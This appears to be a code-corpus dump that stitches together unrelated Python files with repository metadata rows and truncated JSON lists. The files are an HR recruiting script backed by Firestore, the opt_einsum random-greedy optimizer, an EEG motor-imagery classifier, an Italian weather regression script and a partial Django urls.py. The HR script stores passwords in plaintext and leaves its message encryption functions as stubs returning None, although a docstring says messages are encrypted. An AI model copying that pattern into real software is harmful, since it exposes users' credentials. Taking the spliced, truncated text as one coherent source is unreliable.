index_job =url_desc.split("/")[-1].split('.')[0]
name_file = name_hr + "_" + index_job + "_" + str(INDEX_cv)
increment_index_cv()
#my_bucket = storage_client.get_bucket("snipehr_cvs")
#pprint(vars(my_bucket))
#blob = my_bucket.blob(name_file)
#blob.upload_from_filename(file)
#blob.upload_from_filename(file)
db = firestore.client()
new_cv={
'name': name,
'lieu' :lieu,
'email': dict_infos['email'],
'phone': dict_infos['phone'],
'date' : date,
'status': False,
'url_resume': "gs://snipehr_cvs/" + name_file,
'skills':dict_infos['skills']
}
#print(name_hr)
db.collection('hrs').document(read_hr(name_hr).id).collection('resumes').add(new_cv)
def read_file_as_file(uri,name,date,poste):
"""Fonction qui lit la fiche de poste stocker dans le cloud storage à partir de l'URI """
destination = "resumes/"+name+"_"+poste+"_"+date+'.pdf'
blob=""
if(uri != None):
bucket = storage_client.get_bucket(uri.split("/")[-2])
blob = bucket.blob(uri.split("/")[-1])
blob = blob.download_to_filename(destination)
#blob = blob.decode('utf-8')
return blob
def read_file(uri):
"""Fonction qui lit la fiche de poste stocker dans le cloud storage à partir de l'URI """
blob=""
if(uri != None):
bucket = storage_client.get_bucket(uri.split("/")[-2])
blob = bucket.blob(uri.split("/")[-1])
blob = blob.download_as_string()
blob = blob.decode('utf-8')
return blob
def liste_historic(name_hr,url_desc):
"""Fonction qui retourne la liste des historic pour une fiche de poste donnée"""
liste =[]
index_job =url_desc.split("/")[-1].split('.')[0]
name_file = name_hr + "_" + index_job
my_bucket = storage_client.get_bucket("snipehr_historic")
blobs_all = list(my_bucket.list_blobs(prefix=name_file)) #récupère les fiches dont le nom du RH =name_hr et le job concerné à l'index du job en paramètre
print(blobs_all)
for blob in blobs_all:
blob = blob.download_as_string()
blob = blob.decode('utf-8')
liste.append(ast.literal_eval(blob))
return liste
def add_historic(name_hr, commentaire, url_desc):
"""Fonction qui ajoute un historique à une fiche de poste donnée"""
global INDEX_historic
date = datetime.today().strftime('%Y-%m-%d')
#name_file = "gs://snipehr_historic/"
index_job =url_desc.split("/")[-1].split('.')[0] #exemple dans l'URI gs://snipehr_job_desc/1.txt ça récupèrera 1
my_bucket = storage_client.get_bucket("snipehr_historic")
#pprint(vars(my_bucket))
print(index_job)
name = name_hr + "_" + index_job + "_" + str(INDEX_historic)+".txt"
increment_index_historic()
#text_file = open(name, "w")
#n = text_file.write(commentaire)
#text_file.close()
historic =str({"date":date,"commentaire":commentaire})
blob = my_bucket.blob(name)
blob.upload_from_string(historic)
print(blob)
def get_nb_missions_affectees(liste_jobs):
"""Fonction qui renvoie le nombre exacte de missions affecté à partir de la liste des jobs lié au profil"""
nb=0
for job in liste_jobs:
if(job["status"]):
nb+=1
return nb
def set_status(name_hr,job_to_set):
"""Fonction qui met à jour le status d'une mission"""
job =get_job(name_hr,job_to_set)
print(job)
print(job.to_dict()["status"])
hr=read_hr(name_hr)
status = job.to_dict()["status"]
db.collection('hrs').document(hr.id).collection('job_description').document(job.id).update({"status": not status})
def read_company(name_hr):
"""Fonction qui retourne le nom de la compagnie du RH connecté"""
hr=read_hr(name_hr)
return hr.to_dict()["company"]
def chiffrement_message(message,clef):
return None
def dechiffrement_message(message,clef):
return None
def create_message(name_hr,message,nom,post):
"""Fonction qui crée et chiffre le message dans la base de donnée"""
db = firestore.client()
date = datetime.today().strftime('%Y-%m-%d')
new_message={
'date': f'{date}',
'message': f'{message}',
'candidat':f'{nom}',
'post':f'{post}'
}
db.collection('hrs').document(read_hr(name_hr).id).collection('messages').add(new_message)
return None
def create_job_desc(titre,lieu, date, competences, fiche, name_hr):
global INDEX
"""Fonction qui ajoute une fiche de poste dans la base de donée"""
url_desc="gs://snipehr_job_desc/"
url_historic="gs://snipehr_historic/"
lieu =lieu
my_bucket = storage_client.get_bucket("snipehr_job_desc")
#pprint(vars(my_bucket))
name = str(INDEX)+".txt"
increment_index()
#text_file = open(name, "w")
#n = text_file.write(fiche)
#text_file.close()
blob = my_bucket.blob(name)
blob.upload_from_string(fiche)
url_desc+=name
db = firestore.client()
new_job_desc={
'titre': f'{titre}',
'lieu' :f'{lieu}',
'date': f'{date}',
'status': False,
'url_desc': f'{url_desc}',
'url_historic': f'{url_historic}',
'skills':f'{competences}'
}
#print(name_hr)
db.collection('hrs').document(read_hr(name_hr).id).collection('job_description').add(new_job_desc)
def create_hr(name_hr, email_hr, mdp_hr, company_hr):
"""Fonction qui ajoute un RH à notre base de donée """
db = firestore.client()
# A voir pour ajouter le doc avec un id auto généré
new_hr = {
'name': f'{name_hr}',
'email': f'{email_hr}',
'mdp': f'{mdp_hr}',
'company': f'{company_hr}'
}
db.collection('hrs').add(new_hr)
db.collection('hrs').document(read_hr(name_hr).id).collections('job_description')
def set_hr(past_name,name_hr, email_hr, company_hr):
db = firestore.client()
new_hr = {
'name': f'{name_hr}',
'email': f'{email_hr}',
'company': f'{company_hr}'
}
hr=read_hr(past_name)
db.collection('hrs').document(hr.id).update(new_hr)
def get_job(name_hr,job_to_set):
"""Fonction qui nous permet d'avoir l'ID d'une jfiche de description"""
col_jobs = db.collection('hrs').document(read_hr(name_hr).id).collection('job_description')
jobs = col_jobs.stream()
dictfilt = lambda x, y: dict([(i, x[i]) for i in x if i in set(y)])
for job in jobs:
print(dictfilt(job.to_dict(),("url_desc","date")))
print(dictfilt(job_to_set,("url_desc","date")))
#print(dictfilt(job.to_dict(),("date","titre","url_desc","url_historic")))
if dictfilt(job_to_set,("url_desc","date")) == dictfilt(job.to_dict(),("url_desc","date")):
return job
def read_hr(name_hr):
"""fonction qui nous perme d'avoir l'ID du RH à partir du nom"""
# Only get 1 document or hrs
col_hrs = db.collection('hrs').where("name", '==', f'{name_hr}')
hrs = col_hrs.stream()
for hr in hrs:
#print(f'{hr.id} => {hr.to_dict()}')
return hr
def read_hrs():
"""Fonction qui nous permet d'avoir la liste des RHs"""
# Get the hole hrs collection
col_hrs = db.collection('hrs')
hrs = col_hrs.stream()
for hr in hrs:
print(f'{hr.id} => {hr.to_dict()}')
def test(email_hr, mdp_hr):
hr = db.collection('hrs').where("email", '==', f'{email_hr}').where("mdp", '==', f'{mdp_hr}').get()
print(hr)
for h in hr:
print(f'{h.id} => {h.to_dict()}')
def read_jobs(name_hr):
"""Fonction qui retourne la liste des fiches de poste associé à un RH"""
collections = db.collection('hrs').document(read_hr(name_hr).id).collection("job_description").stream()
list_jobs = []
for collection in collections:
list_jobs.append(collection.to_dict())
return list_jobs
def read_resumes(name_hr):
"""Fonction qui retourne la liste des fiches de poste associé à un RH"""
collections = db.collection('hrs').document(read_hr(name_hr).id).collection("resumes").stream()
list_resumes = []
for collection in collections:
list_resumes.append(collection.to_dict())
return list_resumes
def read_messages(name_hr):
"""Fonction qui retourne la liste des fiches de poste associé à un RH"""
messages = db.collection('hrs').document(read_hr(name_hr).id).collection('messages').stream()
list_messages = []
i=1
message_dict ={}
for message in messages:
message_dict=message.to_dict()
message_dict['index']=i
i+=1
list_messages.append(message_dict)
return list_messages
def get_job_title(name_hr,url_resume):
titre =""
url_desc = "gs://snipehr_job_desc/" + url_resume.split("/")[-1].split("_")[-2] +'.txt'
jobs = read_jobs(name_hr)
for job in jobs:
if (job["url_desc"]==url_desc):
titre=job["titre"]
return titre
if __name__ == '__main__':
#create_hr('Khalida', 'test@gmail.fr', 'azerty', 'ESGI')
#read_hr('Test')
#test('test@test.fr', 'test')
#jobs = read_job(read_hr("Test"))
#print(jobs)
#titre=""
#date=""
#status= True
#url_desc=""
#url_historic =""
#create_job_desc(titre, date, status, url_desc, url_historic, read_hr("Khalida"))
name_hr ="Test"
#job_to_set = {'date': '2022-08-25', 'titre': 'Data Analyst', 'url_desc': '', 'url_historic': ''}
#print(get_job(name_hr,{'titre': 'Data', 'date': '2022-11-10', 'url_desc': 'gs://snipehr_job_desc/1.txt', 'url_historic': 'gs://snipehr_job_desc/'}).to_dict()["status"])
#set_status(name_hr, job_to_set)
#print(get_job(name_hr,job_to_set).to_dict()["status"])
#print(read_job(read_hr("Test"))["jobs"])
#set_status("Test",{'status': False, 'date': '2022-08-25', 'titre': 'Data Analyst', 'url_desc': '', 'url_historic': ''})
#read_file("gs://snipehr_job_desc/1.txt")
commentaire ="Test des commentaires"
url_desc = "gs://snipehr_job_desc/1.txt"
#add_historic(name_hr, commentaire, url_desc)
#add_historic(name_hr, commentaire, url_desc)
#print(liste_historic(name_hr, url_desc))
#print(get_nb_missions_affectees(read_jobs(name_hr)))
#add_CV(name_hr,url_desc,"CVNorayda_NSIEMO.pdf","Norayda NSIEMO","2022-09-23","Paris", dict())
#read_file_as_file("gs://snipehr_cvs/Test_1_1","Norayda NSIEMO","2022-09-23","Data Engineer")
| SnipeHR/SnipeHR-github.io | website/query_firestore.py | query_firestore.py | py | 12,180 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "firebase_admin.credentials.Certificate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "firebase_admin.credentials",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "firebase_admin.initialize_app",
"line_number": 17,
"usage_type": "call"... |
26716825256 | """
Support for random optimizers, including the random-greedy path.
"""
import functools
import heapq
import math
import numbers
import time
from collections import deque
from random import choices as random_choices
from random import seed as random_seed
from typing import Any, Dict, Generator, Iterable, List, Optional, Tuple
from . import helpers, paths
from .typing import ArrayIndexType, ArrayType, PathType
__all__ = ["RandomGreedy", "random_greedy", "random_greedy_128"]
class RandomOptimizer(paths.PathOptimizer):
"""Base class for running any random path finder that benefits
from repeated calling, possibly in a parallel fashion. Custom random
optimizers should subclass this, and the `setup` method should be
implemented with the following signature:
```python
def setup(self, inputs, output, size_dict):
# custom preparation here ...
return trial_fn, trial_args
```
Where `trial_fn` itself should have the signature::
```python
def trial_fn(r, *trial_args):
# custom computation of path here
return ssa_path, cost, size
```
Where `r` is the run number and could for example be used to seed a
random number generator. See `RandomGreedy` for an example.
**Parameters:**
- **max_repeats** - *(int, optional)* The maximum number of repeat trials to have.
- **max_time** - *(float, optional)* The maximum amount of time to run the algorithm for.
- **minimize** - *({'flops', 'size'}, optional)* Whether to favour paths that minimize the total estimated flop-count or
the size of the largest intermediate created.
- **parallel** - *({bool, int, or executor-pool like}, optional)* Whether to parallelize the random trials, by default `False`. If
`True`, use a `concurrent.futures.ProcessPoolExecutor` with the same
number of processes as cores. If an integer is specified, use that many
processes instead. Finally, you can supply a custom executor-pool which
should have an API matching that of the python 3 standard library
module `concurrent.futures`. Namely, a `submit` method that returns
`Future` objects, themselves with `result` and `cancel` methods.
- **pre_dispatch** - *(int, optional)* If running in parallel, how many jobs to pre-dispatch so as to avoid
submitting all jobs at once. Should also be more than twice the number
of workers to avoid under-subscription. Default: 128.
**Attributes:**
- **path** - *(list[tuple[int]])* The best path found so far.
- **costs** - *(list[int])* The list of each trial's costs found so far.
- **sizes** - *(list[int])* The list of each trial's largest intermediate size so far.
"""
def __init__(
self,
max_repeats: int = 32,
max_time: Optional[float] = None,
minimize: str = "flops",
parallel: bool = False,
pre_dispatch: int = 128,
):
if minimize not in ("flops", "size"):
raise ValueError("`minimize` should be one of {'flops', 'size'}.")
self.max_repeats = max_repeats
self.max_time = max_time
self.minimize = minimize
self.better = paths.get_better_fn(minimize)
self._parallel = False
self.parallel = parallel
self.pre_dispatch = pre_dispatch
self.costs: List[int] = []
self.sizes: List[int] = []
self.best: Dict[str, Any] = {"flops": float("inf"), "size": float("inf")}
self._repeats_start = 0
self._executor: Any
self._futures: Any
@property
def path(self) -> PathType:
"""The best path found so far."""
return paths.ssa_to_linear(self.best["ssa_path"])
@property
def parallel(self) -> bool:
return self._parallel
@parallel.setter
def parallel(self, parallel: bool) -> None:
# shutdown any previous executor if we are managing it
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
self._parallel = parallel
self._managing_executor = False
if parallel is False:
self._executor = None
return
if parallel is True:
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor()
self._managing_executor = True
return
if isinstance(parallel, numbers.Number):
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor(parallel)
self._managing_executor = True
return
# assume a pool-executor has been supplied
self._executor = parallel
def _gen_results_parallel(self, repeats: Iterable[int], trial_fn: Any, args: Any) -> Generator[Any, None, None]:
"""Lazily generate results from an executor without submitting all jobs at once."""
self._futures = deque()
# the idea here is to submit at least ``pre_dispatch`` jobs *before* we
# yield any results, then do both in tandem, before draining the queue
for r in repeats:
if len(self._futures) < self.pre_dispatch:
self._futures.append(self._executor.submit(trial_fn, r, *args))
continue
yield self._futures.popleft().result()
while self._futures:
yield self._futures.popleft().result()
def _cancel_futures(self) -> None:
if self._executor is not None:
for f in self._futures:
f.cancel()
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
raise NotImplementedError
def __call__(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
memory_limit: Optional[int] = None,
) -> PathType:
self._check_args_against_first_call(inputs, output, size_dict)
# start a timer?
if self.max_time is not None:
t0 = time.time()
trial_fn, trial_args = self.setup(inputs, output, size_dict)
r_start = self._repeats_start + len(self.costs)
r_stop = r_start + self.max_repeats
repeats = range(r_start, r_stop)
# create the trials lazily
if self._executor is not None:
trials = self._gen_results_parallel(repeats, trial_fn, trial_args)
else:
trials = (trial_fn(r, *trial_args) for r in repeats)
# assess the trials
for ssa_path, cost, size in trials:
# keep track of all costs and sizes
self.costs.append(cost)
self.sizes.append(size)
# check if we have found a new best
found_new_best = self.better(cost, size, self.best["flops"], self.best["size"])
if found_new_best:
self.best["flops"] = cost
self.best["size"] = size
self.best["ssa_path"] = ssa_path
# check if we have run out of time
if (self.max_time is not None) and (time.time() > t0 + self.max_time):
break
self._cancel_futures()
return self.path
def __del__(self):
# if we created the parallel pool-executor, shut it down
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
def thermal_chooser(queue, remaining, nbranch=8, temperature=1, rel_temperature=True):
"""A contraction 'chooser' that weights possible contractions using a
Boltzmann distribution. Explicitly, given costs `c_i` (with `c_0` the
smallest), the relative weights, `w_i`, are computed as:
$$w_i = exp( -(c_i - c_0) / temperature)$$
Additionally, if `rel_temperature` is set, scale `temperature` by
`abs(c_0)` to account for likely fluctuating cost magnitudes during the
course of a contraction.
**Parameters:**
- **queue** - *(list)* The heapified list of candidate contractions.
- **remaining** - *(dict[str, int])* Mapping of remaining inputs' indices to the ssa id.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the `temperature` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
**Returns:**
- **cost**
- **k1**
- **k2**
- **k3**
"""
n = 0
choices = []
while queue and n < nbranch:
cost, k1, k2, k12 = heapq.heappop(queue)
if k1 not in remaining or k2 not in remaining:
continue # candidate is obsolete
choices.append((cost, k1, k2, k12))
n += 1
if n == 0:
return None
if n == 1:
return choices[0]
costs = [choice[0][0] for choice in choices]
cmin = costs[0]
# adjust by the overall scale to account for fluctuating absolute costs
if rel_temperature:
temperature *= max(1, abs(cmin))
# compute relative probability for each potential contraction
if temperature == 0.0:
energies = [1 if c == cmin else 0 for c in costs]
else:
# shift by cmin for numerical reasons
energies = [math.exp(-(c - cmin) / temperature) for c in costs]
# randomly choose a contraction based on energies
(chosen,) = random_choices(range(n), weights=energies)
cost, k1, k2, k12 = choices.pop(chosen)
# put the other choice back in the heap
for other in choices:
heapq.heappush(queue, other)
return cost, k1, k2, k12
def ssa_path_compute_cost(
ssa_path: PathType,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[int, int]:
"""Compute the flops and max size of an ssa path."""
inputs = list(map(frozenset, inputs)) # type: ignore
output = frozenset(output)
remaining = set(range(len(inputs)))
total_cost = 0
max_size = 0
for i, j in ssa_path:
k12, flops12 = paths.calc_k12_flops(inputs, output, remaining, i, j, size_dict) # type: ignore
remaining.discard(i)
remaining.discard(j)
remaining.add(len(inputs))
inputs.append(k12)
total_cost += flops12
max_size = max(max_size, helpers.compute_size_by_dict(k12, size_dict))
return total_cost, max_size
def _trial_greedy_ssa_path_and_cost(
r: int,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
choose_fn: Any,
cost_fn: Any,
) -> Tuple[PathType, int, int]:
"""A single, repeatable, greedy trial run. **Returns:** ``ssa_path`` and cost."""
if r == 0:
# always start with the standard greedy approach
choose_fn = None
random_seed(r)
ssa_path = paths.ssa_greedy_optimize(inputs, output, size_dict, choose_fn, cost_fn)
cost, size = ssa_path_compute_cost(ssa_path, inputs, output, size_dict)
return ssa_path, cost, size
class RandomGreedy(RandomOptimizer):
"""
**Parameters:**
- **cost_fn** - *(callable, optional)* A function that returns a heuristic 'cost' of a potential contraction
with which to sort candidates. Should have signature
`cost_fn(size12, size1, size2, k12, k1, k2)`.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the ``temperature`` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction. If False, the
algorithm will end up branching when the absolute cost is low, but
stick to the 'greedy' path when the cost is high - this can also be
beneficial.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
- **kwargs** - Supplied to RandomOptimizer.
"""
def __init__(
self,
cost_fn: str = "memory-removed-jitter",
temperature: float = 1.0,
rel_temperature: bool = True,
nbranch: int = 8,
**kwargs: Any,
):
self.cost_fn = cost_fn
self.temperature = temperature
self.rel_temperature = rel_temperature
self.nbranch = nbranch
super().__init__(**kwargs)
@property
def choose_fn(self) -> Any:
"""The function that chooses which contraction to take - make this a
property so that ``temperature`` and ``nbranch`` etc. can be updated
between runs.
"""
if self.nbranch == 1:
return None
return functools.partial(
thermal_chooser,
temperature=self.temperature,
nbranch=self.nbranch,
rel_temperature=self.rel_temperature,
)
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
fn = _trial_greedy_ssa_path_and_cost
args = (inputs, output, size_dict, self.choose_fn, self.cost_fn)
return fn, args
def random_greedy(
inputs: List[ArrayIndexType],
output: ArrayIndexType,
idx_dict: Dict[str, int],
memory_limit: Optional[int] = None,
**optimizer_kwargs: Any,
) -> ArrayType:
""" """
optimizer = RandomGreedy(**optimizer_kwargs)
return optimizer(inputs, output, idx_dict, memory_limit)
random_greedy_128 = functools.partial(random_greedy, max_repeats=128)
| dgasmith/opt_einsum | opt_einsum/path_random.py | path_random.py | py | 14,478 | python | en | code | 764 | github-code | 36 | [
{
"api_name": "typing.Optional",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_numbe... |
4872107449 | import pyriemann
import mne
from mne.io import read_raw_gdf
import scipy
from scipy import signal
from scipy.signal import butter, filtfilt, sosfiltfilt
import os
import pickle
import sklearn
import seaborn as sns
import matplotlib
import matplotlib as mpl
mpl.use('Qt5Agg') # for using pyplot (pip install pyqt5)
import matplotlib.pyplot as plt
import numpy as np
# Bandpass filtering
def butter_lowpass_filter(data, lowcut, fs, order):
nyq = fs/2
low = lowcut/nyq
b, a = butter(order, low, btype='low')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_highpass_filter(data, highcut, fs, order):
nyq = fs/2
high = highcut/nyq
b, a = butter(order, high, btype='high')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_bandpass_filter(data, lowcut, highcut, fs, order):
nyq = fs/2
low = lowcut/nyq
high = highcut/nyq
sos = butter(order, [low, high], btype='band', output='sos')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = sosfiltfilt(sos, data) # zero-phase filter # data: [ch x time]
# specify pandlen to make the result the same as Matlab filtfilt()
return y
# User parameters
# 769, 770, 774, 780 - left, right, up (tongue), down (feet)
#markers = [769, 770, 780, 774]
#markers_arr = {769:0, 770:1, 780:2, 774:3}
markers = [769, 770] # left, right
markers_arr = {769:1, 770:2}
# for g.tec EEG
nCh = 16
fs = 512
frame = [0.5, 3]
nTime = int((frame[1]-frame[0]) * 512)
#nTrial = 20
nClass = len(markers)
bp = [8, 30]
ch_names = ['FP1', 'FP2', 'F4', 'Fz', 'F3', 'T7', 'C3', 'Cz', 'C4', 'T8', 'P4', 'Pz', 'P3', 'O1', 'Oz', 'O2']
roi = ['F4', 'Fz', 'F3', 'C3', 'Cz', 'C4', 'P4', 'Pz', 'P3']
roi_id = np.zeros((len(roi)), dtype=np.int64)
for i in range(len(roi)):
roi_id[i] = ch_names.index(roi[i]) # use roi_id
nSub = 3
train_EEG = np.array([]).reshape(0, nCh, nTime)
train_labels = []
for i in range(4):
fname = './data/s%02d/MI_run%02d.gdf' % (nSub, (i+1))
print(fname)
eeg = read_raw_gdf(fname)
ano_types = eeg.annotations.description.astype(int) # markers
ano_latency = np.round(eeg.annotations.onset, 4)
eeg_times = np.round(eeg.times, 4)
dat = eeg.get_data() * 1000000
ch_names = eeg.ch_names
merge_EEG = np.array([]).reshape(nCh, nTime, 0)
for cur_markers in markers:
event_indicies = np.argwhere(ano_types == cur_markers)
event_latencies = ano_latency[event_indicies]
print('current marker is '+str(cur_markers))
n_trial = 0
epoched_EEG = np.array([]).reshape(nCh, nTime, 0)
tmp_labels = markers_arr[cur_markers] * np.ones((len(event_latencies)))
train_labels = np.append(train_labels, tmp_labels)
for cur_latency in event_latencies:
m_onset = np.where(eeg_times == cur_latency)[0][0]
tmp_epoch = dat[:, m_onset + int(frame[0]*fs):m_onset + int(frame[1]*fs)]
# epoch-level bandpass filtering
tmp_epoch = butter_bandpass_filter(tmp_epoch, bp[0], bp[1], fs, 4)
epoched_EEG = np.dstack((epoched_EEG, tmp_epoch))
n_trial = n_trial + 1
merge_EEG = np.dstack((merge_EEG, epoched_EEG))
merge_EEG = np.transpose(merge_EEG, (2, 0, 1)) # now [trial x ch x time]
train_EEG = np.vstack((train_EEG, merge_EEG))
cov_train = pyriemann.estimation.Covariances().fit_transform(train_EEG[:, roi_id, :])
print(cov_train.shape)
print(train_labels.shape)
mdm = pyriemann.classification.MDM()
mdm.metric = 'Riemann'
mdm.fit(cov_train, train_labels) # training
mdm_train_acc = np.sum(mdm.predict(cov_train) == train_labels) / len(train_labels) # train - meaningless
print('training accuracy is', np.round(mdm_train_acc,4))
trained = {'COV':cov_train, 'Labels':train_labels}
fname_user = input('Enter model name: ')
fname_model = './data/s%02d/%s.pkl' % (nSub, fname_user)
print(fname_model, 'saved.')
out_file = open(fname_model, 'wb')
pickle.dump(trained, out_file)
out_file.close()
| Kyungho-Won/PyRiemann-with-OpenViBE | train_MI_Riemann.py | train_MI_Riemann.py | py | 4,441 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scipy.signal.butter",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"li... |
34301681133 |
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from dateutil import parser
import numpy as np
import pandas as pd
import datetime
df_ferrara = pd.read_csv('WeatherData/ferrara_270615.csv')
df_milano = pd.read_csv('WeatherData/milano_270615.csv')
df_mantova = pd.read_csv('WeatherData/mantova_270615.csv')
df_ravenna = pd.read_csv('WeatherData/ravenna_270615.csv')
df_torino = pd.read_csv('WeatherData/torino_270615.csv')
df_asti = pd.read_csv('WeatherData/asti_270615.csv')
df_bologna = pd.read_csv('WeatherData/bologna_270615.csv')
df_piacenza = pd.read_csv('WeatherData/piacenza_270615.csv')
df_cesena = pd.read_csv('WeatherData/cesena_270615.csv')
df_faenza = pd.read_csv('WeatherData/faenza_270615.csv')
# dist 是一个装城市距离海边距离的列表
dist = [df_ravenna['dist'][0],
df_cesena['dist'][0],
df_faenza['dist'][0],
df_ferrara['dist'][0],
df_bologna['dist'][0],
df_mantova['dist'][0],
df_piacenza['dist'][0],
df_milano['dist'][0],
df_asti['dist'][0],
df_torino['dist'][0]
]
# temp_max 是一个存放每个城市最高温度的列表
temp_max = [df_ravenna['temp'].max(),
df_cesena['temp'].max(),
df_faenza['temp'].max(),
df_ferrara['temp'].max(),
df_bologna['temp'].max(),
df_mantova['temp'].max(),
df_piacenza['temp'].max(),
df_milano['temp'].max(),
df_asti['temp'].max(),
df_torino['temp'].max()
]
# temp_min 是一个存放每个城市最低温度的列表
temp_min = [df_ravenna['temp'].min(),
df_cesena['temp'].min(),
df_faenza['temp'].min(),
df_ferrara['temp'].min(),
df_bologna['temp'].min(),
df_mantova['temp'].min(),
df_piacenza['temp'].min(),
df_milano['temp'].min(),
df_asti['temp'].min(),
df_torino['temp'].min()
]
# 调用 subplots() 函数,重新定义 fig, ax 变量
fig, ax = plt.subplots()
plt.xticks(rotation=70)
hours = mdates.DateFormatter('%H:%M')
ax.xaxis.set_major_formatter(hours)
# 先把最高温画出来。
fig, ax = plt.subplots()
ax.plot(dist,temp_max,'ro')
# 用线性回归算法得到两条直线,分别表示两种不同的气温趋势,这样做很有趣。我们可以使用scikit-learn库的SVR方法。
from sklearn.svm import SVR
# dist1是靠近海的城市集合,dist2是远离海洋的城市集合
dist1 = dist[0:5]
dist2 = dist[5:10]
# 改变列表的结构,dist1现在是5个列表的集合
# 之后我们会看到 numpy 中 reshape() 函数也有同样的作用
dist1 = [[x] for x in dist1]
dist2 = [[x] for x in dist2]
# temp_max1 是 dist1 中城市的对应最高温度
temp_max1 = temp_max[0:5]
# temp_max2 是 dist2 中城市的对应最高温度
temp_max2 = temp_max[5:10]
# 我们调用SVR函数,在参数中规定了使用线性的拟合函数
# 并且把 C 设为1000来尽量拟合数据(因为不需要精确预测不用担心过拟合)
svr_lin1 = SVR(kernel='linear', C=1e3)
svr_lin2 = SVR(kernel='linear', C=1e3)
# 加入数据,进行拟合(这一步可能会跑很久,大概10多分钟,休息一下:) )
svr_lin1.fit(dist1, temp_max1)
svr_lin2.fit(dist2, temp_max2)
# 关于 reshape 函数请看代码后面的详细讨论
xp1 = np.arange(10,100,10).reshape((9,1))
xp2 = np.arange(50,400,50).reshape((7,1))
yp1 = svr_lin1.predict(xp1)
yp2 = svr_lin2.predict(xp2)
# ax = fig.add_subplot(122)
# 限制了 x 轴的取值范围
ax.set_xlim(0,400)
# 画出图像
ax.plot(xp1, yp1, c='b', label='Strong sea effect')
ax.plot(xp2, yp2, c='g', label='Light sea effect')
print(svr_lin1.coef_) #斜率
print(svr_lin1.intercept_) # 截距
print(svr_lin2.coef_)
print(svr_lin2.intercept_)
# 你可能会考虑将这两条直线的交点作为受海洋影响和不受海洋影响的区域的分界点,或者至少是海洋影响较弱的分界点。
from scipy.optimize import fsolve
# 定义了第一条拟合直线
def line1(x):
a1 = svr_lin1.coef_[0][0]
b1 = svr_lin1.intercept_[0]
return a1*x + b1
# 定义了第二条拟合直线
def line2(x):
a2 = svr_lin2.coef_[0][0]
b2 = svr_lin2.intercept_[0]
return a2*x + b2
# 定义了找到两条直线的交点的 x 坐标的函数
def findIntersection(fun1,fun2,x0):
return fsolve(lambda x : fun1(x) - fun2(x),x0)
result = findIntersection(line1,line2,0.0)
print("[x,y] = [ %d , %d ]" % (result,line1(result)))
ax.plot(result, line1(result), 'ys')
fig.show()
| eternity-phoenix/Private | 气象数据分析/气象线性分析.py | 气象线性分析.py | py | 4,432 | python | zh | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"... |
11538129042 | """
Sandbox URL Configuration
"""
from django.conf import settings
from django.conf.urls import url
from django.views.generic.base import TemplateView
from sandbox.views import BasicSampleFormView, ModesSampleFormView
urlpatterns = [
# Dummy homepage to list demo views
url(r'^$', TemplateView.as_view(
template_name="homepage.html"
), name='home'),
# Sample with codemirror in the raw way
url(r'^raw/$', TemplateView.as_view(
template_name="raw.html"
), name='raw'),
# Basic form sample
url(r'^form/$', BasicSampleFormView.as_view(
template_name="form.html"
), name='form'),
# Mode index list
url(r'^modes/$', ModesSampleFormView.as_view(
template_name="modes.html"
), name='mode-index'),
# Basic form sample with specific mode
url(r'^modes/(?P<mode>[-\w]+)/$', ModesSampleFormView.as_view(
template_name="modes.html"
), name='basic'),
]
| sveetch/djangocodemirror | sandbox/urls.py | urls.py | py | 947 | python | en | code | 31 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.views.generic.base.TemplateView.as_view",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.views.generic.base.TemplateView",
"line_number": 14,
